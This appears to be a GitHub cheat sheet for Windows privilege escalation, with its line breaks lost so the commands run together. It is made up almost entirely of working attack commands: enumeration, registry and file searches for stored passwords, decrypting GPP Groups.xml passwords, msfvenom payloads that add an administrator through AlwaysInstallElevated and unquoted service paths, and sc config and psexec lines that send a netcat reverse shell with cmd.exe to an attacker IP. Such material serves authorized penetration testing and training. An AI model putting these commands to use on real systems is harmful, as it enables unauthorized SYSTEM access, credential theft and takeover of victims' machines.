https://github.com/wwong99/windows-privilege-escalation
WindowsEnumeration# basicssysteminfohostnameecho %username%# usersnet usersnet user <username># networkipconfig /allroute printarp -Anetstat -ano # active network connections# firewall statusnetsh firewall show statenetsh firewall show confignetsh advfirewall firewall show rule all# systeminfo output save in a file, check for vulnerabilitieshttps://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.pypython windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt# Search patches for given patchwmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."--------------------------------------Kernelsysteminfosysteminfo | findstr /B /C:"OS Name" /C:"OS Version"# check for possible exploits, find a place to upload (eg: C:\Inetpub or C:\temp) it, run exe--------------------------------------Weak permissions# this example is for XP SP0# upload accesschk.exe to a writable directory first# for XP version 5.2 of accesschk.exe is neededhttps://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe# check for serices with weak permissionsaccesschk.exe -uwcqv "Authenticated Users" * /accepteula# check for the found services aboveaccesschk.exe -ucqv upnphost# upload nc.exe to writable directorysc config upnphost binpath= "C:\Inetpub\nc.exe -nv <attackerip> 9988 -e C:\WINDOWS\System32\cmd.exe"sc config upnphost obj= ".\LocalSystem" password= ""# check the status nowsc qc upnphost# change start option as AUTO-STARTsc config SSDPSRV start= auto#start the servicesnet start SSDPSRVnet stop upnphostnet start upnphost# listen on port 9988 and you'll get a shell with NT AUTHORITY\SYSTEM privileges--------------------------------------Registry Checks for Passwordsreg query HKLM /f password /t REG_SZ /sreg query HKCU /f password /t REG_SZ /sreg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password--------------------------------------Places to Check for CredentialsC:\sysprep.infC:\sysprep\sysprep.xml%WINDIR%\Panther\Unattend\Unattended.xml%WINDIR%\Panther\Unattended.xmldir /b /s unattend.xmldir /b /s web.configdir /b /s sysprep.infdir /b /s sysprep.xmldir /b /s *pass*dir /b /s vnc.ini----------------------------Groups.xml# Look up ip-addres of DCnslookup nameofserver.whatever.local# It will output something like thisAddress: 192.168.1.101# Now we mount itnet use z: \\192.168.1.101\SYSVOL# And enter itz:# Now we search for the groups.xml filedir Groups.xml /s# decrypt the password in itgpp-decrypt <pass>-----------------------------AlwaysInstallElevatedreg query HKLM\Software\Policies\Microsoft\Windows\Installerreg query HKCU\Software\Policies\Microsoft\Windows\Installer# From the output, notice that “AlwaysInstallElevated” value is 1.# Exploitation:msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msiPlace 'setup.msi' in 'C:\Temp'msiexec /quiet /qn /i C:\Temp\setup.msinet localgroup Administrators---------------------------------Find writable filesdir /a-r-d /s /b/a is to search for attributes. In this case r is read only and d is directory. (look for writable files only)/s means recurse subdirectories/b means bare format. Path and filename only.-----------------------------------Unquoted Pathwmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """# Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe# check for permissions of folder pathicacls "C:\Program Files (x86)\Program Folder"# exploitmsfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exePlace common.exe in ‘C:\Program Files\Unquoted Path Service’.#Open command prompt and type:sc start unquotedsrvcnet localgroup Administrators-----------------------------------# psexec using found credentials# first upload nc.exe to a writable directorypsexec.exe -u <username> -p <password> \\MACHINENAME C:\Inetpub\nc.exe <attackerip> <attackerport> -e C:\windows\system32\cmd.exe